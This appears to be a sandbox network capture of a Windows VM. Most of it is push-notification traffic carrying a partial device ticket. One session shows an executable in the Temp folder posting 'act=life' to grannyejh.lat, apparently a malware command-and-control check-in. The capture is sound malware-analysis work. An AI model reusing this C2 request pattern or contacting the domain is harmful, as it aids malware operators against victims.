2024-12-19 09:09:03 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:09:03 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 52 4c 57 31 7a 79 69 5a 38 6b 32 30 35 31 72 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 34 62 65 63 63 39 65 36 61 39 30 64 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: RLW1zyiZ8k2051r3.2Context: a364becc9e6a90d4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:09:03 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 52 4c 57 31 7a 79 69 5a 38 6b 32 30 35 31 72 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 34 62 65 63 63 39 65 36 61 39 30 64 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: RLW1zyiZ8k2051r3.3Context: a364becc9e6a90d4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:09:04 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:09:04 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 47 39 43 34 56 78 44 70 7a 55 57 44 53 52 6a 4f 5a 63 5a 7a 71 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: G9C4VxDpzUWDSRjOZcZzqg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49724	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:09:15 UTC	69	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 33 0d 0a 4d 53 2d 43 56 3a 20 54 50 66 30 34 47 79 79 64 55 47 4f 6e 68 31 4a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 66 31 65 38 32 39 63 63 30 34 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 303MS-CV: TPf04GyydUGOnh1J.1Context: deef1e829cc045
2024-12-19 09:09:15 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:09:15 UTC	1082	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 39 0d 0a 4d 53 2d 43 56 3a 20 54 50 66 30 34 47 79 79 64 55 47 4f 6e 68 31 4a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 66 31 65 38 32 39 63 63 30 34 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b 70 6d Data Ascii: ATH 2 CON\DEVICE 1059MS-CV: TPf04GyydUGOnh1J.2Context: deef1e829cc045<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+pm
2024-12-19 09:09:15 UTC	216	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 35 0d 0a 4d 53 2d 43 56 3a 20 54 50 66 30 34 47 79 79 64 55 47 4f 6e 68 31 4a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 66 31 65 38 32 39 63 63 30 34 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 195MS-CV: TPf04GyydUGOnh1J.3Context: deef1e829cc045<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:09:15 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:09:15 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 78 4f 5a 38 2b 55 7a 43 37 6b 53 49 53 76 30 75 64 78 44 41 41 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: xOZ8+UzC7kSISv0udxDAAw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49773	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:09:36 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 33 65 2b 4c 73 61 67 43 66 55 69 38 54 2f 75 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 32 38 66 31 62 35 32 33 34 63 31 33 32 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 3e+LsagCfUi8T/ug.1Context: 2c28f1b5234c1328
2024-12-19 09:09:36 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:09:36 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 33 65 2b 4c 73 61 67 43 66 55 69 38 54 2f 75 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 32 38 66 31 62 35 32 33 34 63 31 33 32 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 3e+LsagCfUi8T/ug.2Context: 2c28f1b5234c1328<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:09:36 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 33 65 2b 4c 73 61 67 43 66 55 69 38 54 2f 75 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 32 38 66 31 62 35 32 33 34 63 31 33 32 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 3e+LsagCfUi8T/ug.3Context: 2c28f1b5234c1328<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:09:36 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:09:36 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 79 6e 76 52 43 6d 36 63 34 30 69 39 70 38 2b 4a 53 79 4e 52 4c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ynvRCm6c40i9p8+JSyNRLQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49828	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:09:58 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 54 71 58 73 68 71 6e 76 55 36 53 56 52 48 4a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 33 65 37 64 32 37 31 32 39 66 36 38 65 33 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ETqXshqnvU6SVRHJ.1Context: 33e7d27129f68e39
2024-12-19 09:09:58 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:09:58 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 54 71 58 73 68 71 6e 76 55 36 53 56 52 48 4a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 33 65 37 64 32 37 31 32 39 66 36 38 65 33 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ETqXshqnvU6SVRHJ.2Context: 33e7d27129f68e39<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:09:58 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 54 71 58 73 68 71 6e 76 55 36 53 56 52 48 4a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 33 65 37 64 32 37 31 32 39 66 36 38 65 33 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ETqXshqnvU6SVRHJ.3Context: 33e7d27129f68e39<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:09:59 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:09:59 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4d 52 75 4a 30 35 4e 4c 56 30 75 41 65 41 5a 69 2f 4d 53 78 65 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: MRuJ05NLV0uAeAZi/MSxeA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49878	172.67.179.109	443	6080	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:17 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:10:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:10:30 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bctengatkdb2qai7dev0o1g8nr; expires=Mon, 14 Apr 2025 02:56:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FCzhedTS2l4DtoMsCtAqz5yDeJcXbXlBJr3XcSpLcRC9tIDTSEPJJo0ffGx%2BiNSjvjuGfJKkLE0LQo6PZGJsbAjpZg1IrWa%2F5HsaAVKdXobHyoG5VKiUBaZUQd%2FHejN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464237aa1b43fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1767&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1652518&cwnd=149&unsent_bytes=0&cid=7956ce058ec37300&ts=12815&x=0"
2024-12-19 09:10:30 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:10:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49891	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:23 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 56 6f 5a 47 70 71 48 4e 55 71 6d 30 6f 6e 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 66 34 37 64 65 64 64 66 33 65 33 30 31 38 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: GVoZGpqHNUqm0onh.1Context: 2f47deddf3e30185
2024-12-19 09:10:23 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:10:23 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 47 56 6f 5a 47 70 71 48 4e 55 71 6d 30 6f 6e 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 66 34 37 64 65 64 64 66 33 65 33 30 31 38 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: GVoZGpqHNUqm0onh.2Context: 2f47deddf3e30185<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:10:23 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 56 6f 5a 47 70 71 48 4e 55 71 6d 30 6f 6e 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 66 34 37 64 65 64 64 66 33 65 33 30 31 38 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: GVoZGpqHNUqm0onh.3Context: 2f47deddf3e30185<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
